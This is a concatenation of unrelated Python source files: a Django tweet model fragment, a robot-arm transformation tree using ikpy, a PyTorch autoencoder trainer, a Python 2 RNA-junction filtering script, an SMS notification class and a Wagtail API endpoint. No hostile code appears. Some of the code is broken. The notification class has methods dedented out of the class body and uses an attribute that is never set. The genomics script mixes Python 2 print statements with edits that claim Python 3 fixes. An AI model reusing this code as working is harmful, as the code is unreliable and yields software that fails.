            tweet.text = re_usernames.sub(replace_usernames, tweet.text)
            tweet.text = re_hashtags.sub(replace_hashtags, tweet.text)
            if getattr(settings, 'TWITTER_STRIP_HIGH_MULTIBYTE', False):
                # Drop chars outside the 2-byte UTF-8 range (e.g. emoji).
                chars = [ch for ch in tweet.text if ord(ch) < 0x800]
                tweet.text = ''.join(chars)
            # Twitter timestamps are UTC; shift into the local default tz.
            d = datetime.strptime(tweet_json["created_at"], date_format)
            d -= timedelta(seconds=timezone)
            tweet.created_at = make_aware(d, get_default_timezone())
            tweet.save()
        self.interested = False
        self.save()
class Tweet(models.Model):
    """A single tweet fetched by a :class:`Query`."""
    # Twitter's own ID for the tweet, used to de-duplicate fetches.
    remote_id = models.CharField(_("Twitter ID"), max_length=50)
    created_at = models.DateTimeField(_("Date/time"), null=True)
    text = models.TextField(_("Message"), null=True)
    profile_image_url = models.URLField(_("Profile image URL"), null=True)
    user_name = models.CharField(_("User name"), max_length=100, null=True)
    full_name = models.CharField(_("Full name"), max_length=100, null=True)
    # Populated only when the tweet is a retweet (see Query.run).
    retweeter_profile_image_url = models.URLField(
        _("Profile image URL (Retweeted by)"), null=True)
    retweeter_user_name = models.CharField(
        _("User name (Retweeted by)"), max_length=100, null=True)
    retweeter_full_name = models.CharField(
        _("Full name (Retweeted by)"), max_length=100, null=True)
    query = models.ForeignKey("Query", related_name="tweets")
    objects = TweetManager()
    class Meta:
        verbose_name = _("Tweet")
        verbose_name_plural = _("Tweets")
        ordering = ("-created_at",)
    def __str__(self):
        return "%s: %s" % (self.user_name, self.text)
    def is_retweet(self):
        # Retweets always carry the retweeter's screen name.
        return self.retweeter_user_name is not None
|
# Repository: cheng-chi/cinebot_mini
import ikpy
import numpy as np
from ete3 import Tree
from cinebot_mini.web_utils.blender_client import *
from cinebot_mini.geometry_utils.closed_form_ik import inverse_kinematics_closed_form
class TransformationTree:
    """A tree of named coordinate frames with ikpy kinematic chains as edges.

    Nodes are frame names (strings) rooted at "ROOT". An edge either stores a
    fixed 4x4 homogeneous transform to its parent, or the name of an ikpy
    chain when the node is a link on that chain.
    """
    def __init__(self):
        """A dictionary containing children of a node"""
        self.children = {}
        """A dictionary containing parent of a node"""
        self.parent = {}
        """A dictionary containing transformation to its parent.
        If node is link on ikpy chain, this entry should store the name of the chain."""
        self.transforms = {}
        """A dictionary mapping chain name to ikpy Chain object."""
        self.chains = {}
        """A dictionary stores joint angles of a ikpy Chain"""
        self.chain_states = {}
        self.tree = Tree()
        self.transforms["ROOT"] = np.eye(4)
    def add_node(self, parent_name, child_name, matrix):
        """
        parent_ name: string
        child_name: string, the name of this node
        matrix: 4x4 homogeneous matrix, relative to parent
        """
        # A node may only have one parent; re-adding is an error.
        if child_name in self.parent:
            raise NameError
        self.parent[child_name] = parent_name
        self.transforms[child_name] = matrix
        if parent_name not in self.children:
            self.children[parent_name] = []
        self.children[parent_name].append(child_name)
    def add_chain(self, parent_name, chain: ikpy.chain.Chain):
        """
        parent_name: string
        chain: ikpy.chain.Chain
        """
        chain_name = chain.name
        if chain_name in self.chains:
            raise NameError
        self.chains[chain_name] = chain
        # The chain base link attaches to the parent with an identity
        # transform; subsequent links store the chain name as their edge.
        self.add_node(parent_name, chain.links[0].name, np.eye(4))
        for i in range(len(chain.links)-1):
            self.add_node(chain.links[i].name, chain.links[i+1].name, chain_name)
        # Chains start at the zero configuration.
        default_state = [0 for _ in range(len(chain.links) - 1)]
        self.set_chain_state(chain_name, default_state)
    def set_chain_state(self, chain_name, state):
        """
        Chain_name: string
        State: (a Iterable of floats) or (a 1D numpy array)
        The length of the state should match the corresponding chain. If not, raise an exception.
        """
        # Link 0 is the fixed base, so a chain of N links has N-1 joints.
        if len(self.chains[chain_name].links) != (len(state) + 1):
            raise ValueError
        self.chain_states[chain_name] = state
    def get_ancestor(self, node):
        """Return the list of ancestors of *node*, nearest first, ending at ROOT."""
        # ancestor = [node]
        ancestor = []
        while node in self.parent:
            node = self.parent[node]
            ancestor.append(node)
        return ancestor
    def get_transform_same(self, to_name, from_name, ancestor):
        """
        Return the 4x4 homogeneous matrix from two nodes on the same branch
        """
        # Walk the chain of frames from from_name up to (but excluding)
        # to_name, accumulating H = T_parent * H at each fixed edge and
        # batching consecutive chain links via forward kinematics.
        trace = ancestor[: ancestor.index(to_name)]
        trace.insert(0, from_name)
        H = np.eye(4)
        chain_name = ''
        link_count = 0
        for i in range(len(trace)):
            node = trace[i]
            if type(self.transforms[node]) == str:
                # Node is a link on a chain; count how many links in a row.
                if self.transforms[node] != chain_name:
                    chain_name = self.transforms[node]
                    link_count = 0
                link_count += 1
            else:
                # either a node or a chain base
                if link_count > 0:
                    # Flush the pending chain-link segment using FK.
                    chain = self.chains[chain_name]
                    state = self.chain_states[chain_name]
                    link_transform = chain.forward_kinematics([0] + list(state), full_kinematics=True)[link_count]
                    H = np.dot(link_transform, H)
                    link_count = 0
                H = np.dot(self.transforms[node], H)
        if link_count > 0:
            # to_name is a link in a chain
            chain = self.chains[chain_name]
            state = self.chain_states[chain_name]
            if type(self.transforms[to_name]) != str:
                # to_name is the chain base
                link_transform = chain.forward_kinematics([0] + list(state), full_kinematics=True)[link_count]
                H = np.dot(link_transform, H)
            else:
                # find the position of from_name link
                for j in range(len(chain.links)):
                    if chain.links[j].name == from_name:
                        break
                # to_name -> links[j]
                # end link -> links[j + link_count]
                # NOTE(review): this FK call passes `state` without the [0]
                # base-joint prefix used elsewhere — confirm intended.
                forward_transforms = chain.forward_kinematics(state, full_kinematics=True)
                end_base = forward_transforms[j + link_count]
                from_base = forward_transforms[j]
                # end_base = from_base * end_from
                end_from = np.dot(np.array(np.mat(from_base).I), end_base)
                H = np.dot(end_from, H)
        return H
    def get_transform(self, from_name, to_name="ROOT"):
        """
        from_name: string
        to_name: string
        Should return 4x4 homogeneous matrix from “from_name” node to “to_name” node.
        Note: the two frames queried might not be on the same branch of the transformation tree! Some non-trivial tree traversal algorithm is needed.
        """
        if to_name == from_name:
            return np.mat(np.eye(4))
        from_name_ancestor = self.get_ancestor(from_name)
        # print(to_name_ancestor)
        if to_name in from_name_ancestor:
            # to_name and from_name are on the same branch
            return self.get_transform_same(to_name, from_name, from_name_ancestor)
        to_name_ancestor = self.get_ancestor(to_name)
        # print(from_name_ancestor)
        if from_name in to_name_ancestor:
            # from_name is descendant of to_name
            return np.array(np.mat(self.get_transform_same(from_name, to_name, to_name_ancestor)).I)
        common_ancestor = None
        # to_name and from_name are on different branches
        for i in range(len(from_name_ancestor)):
            if from_name_ancestor[i] in to_name_ancestor:
                common_ancestor = from_name_ancestor[i]
                break
        # Combine both branch transforms through the common ancestor.
        from_common = self.get_transform_same(common_ancestor, from_name, from_name_ancestor)
        to_common = self.get_transform_same(common_ancestor, to_name, to_name_ancestor)
        # from_common = to_common * from_to
        from_to = np.dot(np.array(np.mat(to_common).I), from_common)
        return from_to
    def set_transform(self, frame_name, transform_mat):
        """
        Sets state of nearest parent chain, raises exception if cannot be done.
        :param frame_name:
        :param transform_mat:
        :return:
        """
        chain_name = None
        top_to_end_effector = np.eye(4)
        chain_root_to_root = np.eye(4)
        curr_frame = frame_name
        # Walk up from frame_name collecting the fixed transform down to the
        # first chain end-effector found on the way to ROOT.
        while True:
            if curr_frame not in self.parent:
                # we are at root
                break
            if type(self.transforms[curr_frame]) is str:
                # we found the first chain
                chain_name = self.transforms[curr_frame]
                chain_root_name = self.chains[chain_name].links[0].name
                chain_root_to_root = self.get_transform(chain_root_name)
                break
            curr_to_parent = self.transforms[curr_frame]
            top_to_end_effector = curr_to_parent @ top_to_end_effector
            curr_frame = self.parent[curr_frame]
        if chain_name is None:
            raise RuntimeError("Could not find chain between this frame and ROOT.")
        # Express the target pose in the chain-root frame, stripping the
        # fixed offset between the end effector and frame_name.
        end_effector_to_chain_root = np.linalg.inv(chain_root_to_root)\
            @ transform_mat\
            @ np.linalg.inv(top_to_end_effector)
        initial_config = self.chain_states[chain_name]
        # new_config = self.chains[chain_name].inverse_kinematics(
        #     end_effector_to_chain_root, [0] + list(initial_config))
        try:
            # new_config = inverse_kinematics_closed_form(
            #     self.chains[chain_name],
            #     end_effector_to_chain_root,
            #     [0] + list(initial_config))
            new_config = inverse_kinematics_closed_form(
                self.chains[chain_name],
                end_effector_to_chain_root)
            # Drop the leading base-joint entry when storing the state.
            self.set_chain_state(chain_name, new_config[1:])
        except ValueError as e:
            # IK failed for this pose; report and keep the previous state.
            print("Value error, transform:")
            print(transform_mat)
    def get_subtree(self, t, node_name):
        """Recursively mirror this tree's topology below *node_name* into ete3 tree *t*."""
        if node_name in self.children:
            tree_node = t.search_nodes(name=node_name)[0]
            for child in self.children[node_name]:
                tree_node.add_child(name=child)
            for child in self.children[node_name]:
                t = self.get_subtree(t, child)
        return t
    def get_ete(self):
        """
        Return a ete3.Tree representing the topology of the transformation tree, with each node having its corresponding name.
        """
        return self.get_subtree(Tree("ROOT;"), "ROOT")
    def plot(self):
        """
        Plot the tree with ete3
        """
        self.tree = self.get_ete()
        print(self.tree.get_ascii(show_internal=True))
    def plot_blender(self, axis_size=0.05):
        """Mirror every frame into Blender as an EMPTY object at its world pose."""
        for frame_name in self.transforms.keys():
            if not test_object_exist(frame_name):
                create_object(frame_name, type="EMPTY")
                set_property(frame_name, "empty_display_size", axis_size)
        for frame_name in self.transforms.keys():
            matrix = self.get_transform(frame_name)
            set_transform_matrix(frame_name, matrix)
    def set_transform_blender(self, frame_name):
        """Pull *frame_name*'s world matrix from Blender and solve IK for it."""
        assert(frame_name in self.transforms)
        camera_properties = get_property(frame_name)
        b_camera_mat = np.array(camera_properties["properties"]["matrix_world"])
        self.set_transform(frame_name, b_camera_mat)
    def add_node_relative(self, parent_name, child_name, reference_name, child_ref):
        """
        parent_name: string, the name of the parent node
        child_name: string, the name of this node
        Referece_name: string, the name of reference node
        child_ref: 4x4 homogeneous matrix, relative to reference node
        """
        parent_ref = self.get_transform(parent_name, reference_name)
        # child_ref = parent_ref * child_parent
        child_parent = np.dot(np.array(np.mat(parent_ref).I), child_ref)
        self.add_node(parent_name, child_name, child_parent)
|
import torch
import torch.nn as nn
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from models import ConvAutoencoder, ImgDataset
import argparse
import time
import os
def ensure_folder(folder):
    """Create *folder* (including parents) if it does not already exist."""
    # exist_ok avoids the check-then-create race of exists() + makedirs().
    os.makedirs(folder, exist_ok=True)
def time_msec():
    """Return the current Unix time in whole milliseconds."""
    return int(round(1000 * time.time()))
def train(input_folder, output_folder, lr=0.001, epochs=40, img_format='.png'):
    """Train ConvAutoencoder on images under ``input_folder/train``, evaluate
    it on ``input_folder/test``, and save the weights into *output_folder*.

    Args:
        input_folder: folder containing 'train' and 'test' image subfolders.
        output_folder: destination folder for the saved ``.pt`` state dict.
        lr: Adam learning rate.
        epochs: number of training epochs.
        img_format: image file extension to load.
    """
    ensure_folder(output_folder)
    model = ConvAutoencoder()
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    model = model.to(device)
    transform = transforms.ToTensor()
    train_folder = input_folder + '/train'
    print(f"Create train dataset from - {train_folder}")
    train_data = ImgDataset(train_folder, transform, device, img_format)
    print(f"Train dataset size - {len(train_data)}")
    # DataLoader settings: single-process loading, 20 samples per batch.
    num_workers = 0
    batch_size = 20
    print(f"Create dataloader batches={batch_size} and workers={num_workers}")
    train_loader = DataLoader(train_data, batch_size=batch_size, num_workers=num_workers, shuffle=True)
    # Pixel-wise binary cross-entropy; ToTensor() yields values in [0, 1].
    criterion = nn.BCELoss()
    optimizer = torch.optim.Adam(model.parameters(), lr)
    for epoch in range(1, epochs + 1):
        ###################
        # Train the model #
        ###################
        model.train()
        train_loss = 0.0
        for images in train_loader:
            # clear the gradients of all optimized variables
            optimizer.zero_grad()
            # forward pass: the autoencoder reconstructs its input
            outputs, encoder_output = model(images, encoder_mode=False)
            loss = criterion(outputs, images)
            # backward pass + parameter update
            loss.backward()
            optimizer.step()
            # accumulate the per-sample (batch-size weighted) loss
            train_loss += loss.item() * images.size(0)
        # BUGFIX: average over samples, not batches — the sum above is
        # weighted by batch size, so divide by the dataset size.
        train_loss = train_loss / len(train_data)
        print('Epoch: {} \tTraining Loss: {:.6f}'.format(epoch, train_loss))
    ###################
    # Test the model  #
    ###################
    model.eval()
    test_folder = input_folder + '/test'
    test_data = ImgDataset(test_folder, transform, device, img_format)
    test_loader = DataLoader(test_data, batch_size=batch_size, num_workers=num_workers)
    eval_loss = 0.0
    # BUGFIX: evaluation does not need gradients; no_grad saves memory/time.
    with torch.no_grad():
        for images in test_loader:
            outputs, x_encoders = model(images, encoder_mode=False)
            loss = criterion(outputs, images)
            eval_loss += loss.item() * images.size(0)
    eval_loss = eval_loss / len(test_data)
    print('\tEvaluation Loss: {:.6f}'.format(eval_loss))
    # Save model weights with a millisecond timestamp in the filename.
    model_root = output_folder + '/conv_autoencoder_' + str(time_msec()) + '.pt'
    print(f"Saving trained model to: {model_root}")
    torch.save(model.state_dict(), model_root)
def main():
    """Parse command-line arguments and launch training."""
    parser = argparse.ArgumentParser(description='Train conv autoencoder on dataset.'
                                                 'Must have train and test dataset folders'
                                                 ' located in input')
    parser.add_argument('input', metavar='input', type=str,
                        help='Source folder full path.')
    parser.add_argument('output', metavar='output', type=str,
                        help='Destination folder full path.')
    # Let argparse validate/convert the numeric arguments directly instead
    # of accepting strings and converting later (also fixes metavar 'lt').
    parser.add_argument('lr', metavar='lr', type=float,
                        help='Learning rate')
    parser.add_argument('epochs', metavar='epochs', type=int,
                        help='Number of training epochs.')
    args = parser.parse_args()
    train(args.input, args.output, args.lr, args.epochs)
# Script entry point: announce the run, then parse CLI args and train.
if __name__ == '__main__':
    print("<<<<<<<<<<<<<<< Start training >>>>>>>>>>>>>>>>>")
    main()
|
import time,sys,getopt,os
def bl8_jun_filter(bl8_format,junfile,genefile,criterion_len,prefix,gap_j):
    # Classify junction-supporting reads as type-II errors by mapping them
    # back against the genome (bl8 alignments) and gene bodies.
    # NOTE: Python 2 only — uses dict.has_key() here and below.
    # Rows in type2_erro_list are written to "<prefix>_wrong_bl8".
    fr_jun_bl8 = [r1.strip().split("\t") for r1 in open(bl8_format).readlines()]
    fr_jun_type1 = [r2.strip().split("\t") for r2 in open(junfile).readlines()]
    fr_genebody=[r3.strip().split("\t") for r3 in open(genefile).readlines()]
    nf=len(fr_jun_bl8);type2_erro_list=[];jun_dict={}
    ns= len(fr_jun_type1);seg_dict={}
    ne=len(fr_genebody);gene_plus_dict={};gene_minus_dict={}
    # Group bl8 alignment rows by the junction id (text before '*').
    for b_j in range(nf):
        par_j = fr_jun_bl8[b_j][0].split("*")[0]
        if jun_dict.has_key(par_j):
            jun_dict[par_j].append(fr_jun_bl8[b_j])
        else:
            jun_dict[par_j]=[fr_jun_bl8[b_j]]
    # Index gene bodies by chromosome, split by strand.
    for b_e in range(ne):
        par_e = [fr_genebody[b_e][0], float(fr_genebody[b_e][3]), float(fr_genebody[b_e][4]), fr_genebody[b_e][7],fr_genebody[b_e][8]]
        par_chr=fr_genebody[b_e][0]
        if fr_genebody[b_e][6]=="+":
            if gene_plus_dict.has_key(par_chr):
                gene_plus_dict[par_chr].append(par_e)
            else:
                gene_plus_dict[par_chr]=[par_e]
        elif fr_genebody[b_e][6]=="-":
            if gene_minus_dict.has_key(par_chr):
                gene_minus_dict[par_chr].append(par_e)
            else:
                gene_minus_dict[par_chr]=[par_e]
    # Map each junction key -> (strand, chromosome-ish field) for lookups.
    for b_s in range(ns):
        par_s=fr_jun_type1[b_s][0]+"_"+fr_jun_type1[b_s][1]+"_"+fr_jun_type1[b_s][2]
        seg_dict[par_s]=[fr_jun_type1[b_s][5],fr_jun_type1[b_s][3]]
    for vx in jun_dict.keys():
        jun_list=jun_dict[vx]
        # The read name encodes the two junction flank intervals as
        # "...*l_l~l_r~r_l~r_r"; derive both flank midpoints.
        jun_l_l=float(jun_dict[vx][0][0].split("*")[1].split("~")[0])
        jun_l_r=float(jun_dict[vx][0][0].split("*")[1].split("~")[1])
        jun_l_mid = (jun_l_l+jun_l_r) / 2
        jun_r_l=float(jun_dict[vx][0][0].split("*")[1].split("~")[2])
        jun_r_r=float(jun_dict[vx][0][0].split("*")[1].split("~")[3][:-2])
        jun_r_mid = (jun_r_l +jun_r_r) / 2
        chr_w=seg_dict[vx][1]
        nchr = jun_dict[vx][0][0].split("_")[0]
        leftfactor = False
        rightfactor = False
        # A junction must map back to both flanks ("primary" hits);
        # the remaining hits are then screened one by one.
        leftfactor, rightfactor, fus_list_els = find_primary_map(jun_list,jun_l_mid, jun_r_mid,nchr,gap_j,leftfactor,rightfactor)
        if leftfactor and rightfactor:
            for pj in jun_list:
                old_len=len(type2_erro_list)
                type2_erro_list=filter_one_jun(pj,nchr,jun_l_mid, jun_r_mid, jun_l_l, jun_l_r, jun_r_l, jun_r_r, type2_erro_list, chr_w, gene_plus_dict, gene_minus_dict, vx,criterion_len,gap_j)
                if len(type2_erro_list)> old_len:
                    # One disqualifying hit is enough for this junction.
                    break
        else:
            type2_erro_list.append([vx] + jun_list[1]+["couldnot mapping back"])
    # Persist all flagged rows, tab separated.
    lf = open(prefix+"_wrong_bl8",'w+')
    t1_list=[]
    for it in type2_erro_list:
        ss = '\t'.join(it)
        t1_list.append(ss)
    lf.writelines("\n".join(t1_list) + "\n")
    lf.close()
    return type2_erro_list
def find_primary_map(jun_list,jun_l_mid, jun_r_mid,nchr,gap_j,leftfactor,rightfactor):
    """Split *jun_list* into primary back-mapped hits and leftovers.

    A hit is primary when it has >90% identity, a read length near 100,
    sits on chromosome *nchr*, lands near one of the two flank midpoints,
    and its query interval ends (left flank) or starts (right flank)
    around position 100. Returns (leftfactor, rightfactor, leftovers).
    """
    window = gap_j + 20
    primary = []
    for rec in jun_list:
        query_left = float(rec[6])
        query_right = float(rec[7])
        seq_len = float(rec[3])
        identity = float(rec[2])
        target_lo = min(float(rec[8]), float(rec[9]))
        target_hi = max(float(rec[8]), float(rec[9]))
        target_mid = (target_lo + target_hi) / 2
        if identity > 90 and abs(seq_len - 100) <= 30 and rec[1] == nchr:
            near_left = abs(target_mid - jun_l_mid) <= window
            near_right = abs(target_mid - jun_r_mid) <= window
            if near_left or near_right:
                if 100 - window <= query_right <= 100 + window:
                    primary.append(rec)
                    leftfactor = True
                elif 100 - window <= query_left <= 100 + window:
                    primary.append(rec)
                    rightfactor = True
    leftovers = [rec for rec in jun_list if rec not in primary]
    return leftfactor, rightfactor, leftovers
def filter_one_jun(pj,nchr,jun_l_mid,jun_r_mid,jun_l_l,jun_l_r,jun_r_l,jun_r_r,type2_erro_list,chr_w,gene_plus_dict,gene_minus_dict,vx,criterion_len,gap_j):
    """Screen one alignment *pj*; append a flagged row to *type2_erro_list*
    when it disqualifies junction *vx* (same-identity hit elsewhere,
    same-gene overlap, or a co-linear explanation). Returns the list.
    """
    q_l = float(pj[6])
    q_r = float(pj[7])
    t_l = min(float(pj[8]), float(pj[9]))
    t_r = max(float(pj[8]), float(pj[9]))
    mid_t = (t_l + t_r) / 2
    len_seq = float(pj[3])
    map_identity = float(pj[2])
    chr_p = pj[1]
    # Only hits well away from both junction flanks with decent identity
    # can disqualify the junction.
    if abs(mid_t - jun_l_mid) > 50 and abs(mid_t - jun_r_mid) > 50 and map_identity > 85:
        if (100 - gap_j <= q_r <= 100 + gap_j) or (100 - gap_j <= q_l <= 100 + gap_j):
            if map_identity == 100 and len_seq > criterion_len:
                type2_erro_list.append([vx] + pj + ['SameIdentityfalse_1'])
            elif map_identity >= 95 and 100 - gap_j - 20 <= len_seq <= 100 + gap_j + 20:
                type2_erro_list.append([vx] + pj + ['SameIdentityfalse_2'])
            # BUGFIX: `in` replaces Python-2-only dict.has_key() (works in
            # both Python 2 and 3).
            elif len_seq > 20 and chr_p in gene_plus_dict and chr_p in gene_minus_dict:
                type2_erro_list = filter_same_gene(vx, pj, nchr, t_l, t_r, gene_plus_dict, gene_minus_dict, type2_erro_list, chr_w, jun_l_l, jun_l_r, jun_r_l, jun_r_r)
        elif q_l <= 60 and q_r >= 140 and len_seq > criterion_len and map_identity > 95:
            type2_erro_list.append([vx] + pj + ["Co_linear explanation"])
    return type2_erro_list
def filter_same_gene(vx, pj,nchr,t_l, t_r,gene_plus_dict, gene_minus_dict, type2_erro_list,chr_w,jun_l_l,jun_l_r,jun_r_l, jun_r_r):
    """Flag *pj* as 'SameGeneFalse' when the hit and either junction flank
    fall in the same gene (or the two flanks share a gene). Gene lookup is
    restricted to the strand given by *chr_w*. Returns *type2_erro_list*.
    """
    strand_genes = []
    if chr_w == "+":
        strand_genes = gene_plus_dict[pj[1]]
    elif chr_w == "-":
        strand_genes = gene_minus_dict[pj[1]]

    def _first_overlap(ref_chr, lo, hi, fallback):
        # First gene on the chromosome overlapping [lo, hi] by >20 bp;
        # entry layout: [chrom, start, end, gene_id, tag].
        for entry in strand_genes:
            if ref_chr == entry[0] and (min(hi, entry[2]) - max(lo, entry[1])) > 20:
                return entry[3:]
        return [fallback, fallback]

    gene_jun_l = _first_overlap(nchr, jun_l_l, jun_l_r, 'none1')
    gene_jun_r = _first_overlap(nchr, jun_r_l, jun_r_r, 'none2')
    gene_q = _first_overlap(pj[1], t_l, t_r, 'none3')
    same_gene_id = (gene_q[0] == gene_jun_l[0]
                    or gene_q[0] == gene_jun_r[0]
                    or gene_jun_l[0] == gene_jun_r[0])
    if same_gene_id:
        type2_erro_list.append([vx] + pj + ['SameGeneFalse'])
    elif gene_q[1] != 'none' and gene_jun_r[1] != "none":
        # Fall back to comparing the secondary tag when gene ids differ.
        if gene_q[1] == gene_jun_l[1] or gene_q[1] == gene_jun_r[1] or gene_jun_l[1] == gene_jun_r[1]:
            type2_erro_list.append([vx] + pj + ['SameGeneFalse'])
    return type2_erro_list
def co_jun_filter(bl8file,typeI_junfile,prefix):
    """Keep only type-I junctions with no supporting hit in *bl8file*.

    Junction keys are "col0_col1_col2" of each row in *typeI_junfile*.
    Surviving rows (columns 0-4 plus the last 4) are written to
    "<prefix>_typeIIfiltered.txt" when any survive.

    Returns:
        (all_jun, list_jun): all_jun maps each key to 1 + its hit count;
        list_jun holds the keys with no hits.
    """
    # `with` closes the input files (the original leaked the handles).
    with open(bl8file) as fh:
        fr_bl8 = [r1.strip().split("\t") for r1 in fh.readlines()]
    with open(typeI_junfile) as fh:
        fr_jun = [r1.strip().split("\t") for r1 in fh.readlines()]
    all_jun = {}
    for row in fr_jun:
        all_jun[row[0] + '_' + row[1] + "_" + row[2]] = 1
    for bp in fr_bl8:
        pp1 = bp[0]
        # BUGFIX: `in` replaces Python-2-only dict.has_key().
        if pp1 in all_jun:
            all_jun[pp1] = all_jun[pp1] + 1
    list_jun = [k for (k, v) in all_jun.items() if v == 1]
    filtered_jun = [row for row in fr_jun
                    if row[0] + '_' + row[1] + "_" + row[2] in list_jun]
    t2_list = ['\t'.join(it2[:5] + it2[-4:]) for it2 in filtered_jun]
    if len(t2_list) > 0:
        with open(prefix + "_typeIIfiltered.txt", 'w+') as lf2:
            lf2.writelines("\n".join(t2_list) + "\n")
    return all_jun, list_jun
def main(argv):
    # CLI driver for the type-II junction filter (Python 2: uses print
    # statements). Options: -i type-I-filtered junctions, -b bl8 alignments,
    # -e gene body file.
    t1 = time.time()
    typeI_junfile =''
    bl8_format=''
    genefile=''
    try:
        opts, args = getopt.getopt(argv, "hi:b:e:", ["ifile=","bfile=","efile="])
    except getopt.GetoptError:
        print 'python typeII_erro_junctions_filter.py -i <typeI erro filtered junctions file> -b <bl8_format file> -e genefile '
        sys.exit(3)
    for opt, arg in opts:
        if opt == '-h':
            print 'python typeII_erro_junctions_filter.py -i <typeI erro filtered junctions file> -b <bl8_format file> -e genefile'
            sys.exit()
        elif opt in ("-i", "--ifile"):
            typeI_junfile = arg
        elif opt in ("-b", "--bfile"):
            bl8_format = arg
        elif opt in ("-e", "--efile"):
            genefile = arg
    # Output files share the junction file's name without its extension.
    prefix=typeI_junfile[:-4]
    gap_j=4
    bl8_jun_filter(bl8_format, typeI_junfile, genefile, 80,prefix,gap_j)
    co_jun_filter(prefix+"_wrong_bl8",typeI_junfile,prefix)
    # Clean up intermediate files produced along the way.
    os.system("rm " + prefix + "*exon*")
    os.system("rm " + prefix + "*bl8*")
    t2=time.time()
    print "The time needed in typeII error filter for junctions is:",t2-t1
|
import os
from app.core import config
from app.notifications.utils import Utils
from app.notifications.text_service import TextSerivce
from app.notifications.combox_client import ComboxClient
import logging
class NotificationsFactory(object):
    def __init__(self):
        """Wire up the text lookup and SMS/WhatsApp clients used by every
        notification method."""
        self.text_service = TextSerivce()
        self.combox_client = ComboxClient()
        self.__logger = logging.getLogger(__name__)
        # self.base_url = config.SERVER_HOST
        # NOTE(review): base_url is commented out above, but
        # send_first_reminder reads self.base_url — confirm whether it
        # should be restored from config.
    def send_verification_code(self, phone_number: str, otp_code: str) -> None:
        """Send the one-time password *otp_code* to *phone_number* via SMS.

        Raises:
            RuntimeError: if the SMS provider reports a failure.
        """
        text = self.text_service.get_text('sms.auth.message').format(otp_code)
        result = self.combox_client.send_sms_message(message=text, phone_number=phone_number)
        # result can be either OTP or None
        if not result:
            raise RuntimeError("Failed sending OTP to: {}".format(phone_number))
def __send_whatspp_template(self, phone_number: str, template_name: str, *params) -> str or bool:
self.__logger.info("#__send_whatspp_template# send whatsapp template: {}".format(template_name))
localized_params= self.__format_params(params)
return self.combox_client.send_whatsapp_message(phone_number=phone_number, template_name=template_name,
localized_params=localized_params)
def __format_params(self, *params):
localized_params = []
for param in params:
param_val = {
"default": param
}
localized_params.append(param_val)
self.__logger.info("#__format_params# params: {}".format(localized_params))
return localized_params
    def send_whatsapp_welcome_message(self, phone_number: str, name: str) -> str or bool:
        """Send the localized welcome message for *name* to *phone_number*.

        Currently delivered over SMS; the WhatsApp-template path is kept
        below, commented out.
        """
        message = self.text_service.get_text("whatsapp.welcome.message").format(name)
        self.__logger.info("#send_whatsapp_welcome_message# message: {} to {}".format(message,phone_number))
        return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
        # template_name = self.text_service.get_text("whatsapp.welcome.template")
        # return self.__send_whatspp_template(phone_number,template_name,name)
        # return self.twilio_client.send_sms_message(message,phone_number)
    def send_new_assistance_request(self, volunteer_name: str, volunteer_phone: str, distance: object, elder_name: str,
                                    mission_url: str) -> object:
        """Notify *volunteer_phone* about a new assistance request near them.

        NOTE(review): __shrink_url is not defined in this part of the class —
        confirm it exists elsewhere in the file.
        """
        mission_url = self.__shrink_url(mission_url)
        message = self.text_service.get_text("whatsapp.new.assistance.message").format(volunteer_name,distance,elder_name,elder_name,mission_url)
        self.__logger.info("#send_new_assistance_request# message: {} to {}".format(message, volunteer_phone))
        return self.combox_client.send_sms_message(message=message,phone_number=volunteer_phone)
        # template_name = self.text_service.get_text("whatsapp.new.assistance.template")
        # return self.__send_whatspp_template(volunteer_phone,template_name,volunteer_name,distance,elder_name,elder_name,mission_url)
        # # return self.twilio_client.send_sms_message(message,volunteer_phone)
def send_cancel_volunteer_notification(self, volunteer_name: str, phone_number: str) -> str or bool:
message = self.text_service.get_text("whatsapp.cancel.notifications.message").format(volunteer_name)
self.__logger.info("#send_cancel_volunteer_notification# message: {} to {}".format(message, phone_number))
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.cancel.notifications.template")
# return self.__send_whatspp_template(phone_number,template_name,volunteer_name)
# return self.twilio_client.send_sms_message(message, phone_number)
def send_volunteer_resubscribed(self, volunteer_name: str, phone_number: str) -> str or bool:
message = self.text_service.get_text("whatsapp.resubscribed.message").format(volunteer_name)
self.__logger.info("#send_new_assistance_request# message: {} to {}".format(message, phone_number))
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.resubscribed.template")
# return self.__send_whatspp_template(phone_number,template_name,volunteer_name)
# return self.twilio_client.send_sms_message(phone_number=phone_number,template_name=template_name,)
def send_first_reminder(self, volunteer_name: str, phone_number: str, elder_name: str, mission_id: str) -> bool or str:
mission_url = self.__shrink_url(self.base_url + mission_id)
message = self.text_service.get_text("whatsapp.first.reminder.message").format(volunteer_name, elder_name,
mission_url)
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.first.reminder..template")
# return self.__send_whatspp_template(phone_number,template_name,volunteer_name,elder_name,mission_url)
# return self.twilio_client.send_sms_message(message, phone_number)
def send_second_reminder(self, volunteer_name: str, elder_name: str, phone_number: str, mission_id: str) -> bool:
missions_url = self.__shrink_url(self.base_url + mission_id)
message = self.text_service.get_text("whatsapp.second.reminder.message").format(volunteer_name, elder_name,
missions_url)
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.second.reminder.template")
# return self.__send_whatspp_template(phone_number,template_name,volunteer_name,elder_name,missions_url)
# return self.twilio_client.send_sms_message(message, phone_number)
def __shrink_url(self, link: str) -> str:
shrink = Utils.shrink_url(link)
self.__logger.info("#__shrink_url# shrinked url: {} to: {}".format(link, shrink))
return shrink
|
from wagtail.api.v2.endpoints import BaseAPIEndpoint, PagesAPIEndpoint
from wagtail.api.v2.filters import (FieldsFilter, OrderingFilter, SearchFilter)
from wagtail.api.v2.utils import BadRequestError
from rest_framework.renderers import BrowsableAPIRenderer
from djangorestframework_camel_case.render import CamelCaseJSONRenderer
from .serializers import SimulationExampleSerializer
from .models import SimulationExample
class WebsimPagesAPIEndpoint(PagesAPIEndpoint):
    """Stock wagtail pages endpoint, but responses are rendered as
    camelCased JSON (plus the browsable API for development)."""

    renderer_classes = [CamelCaseJSONRenderer, BrowsableAPIRenderer]
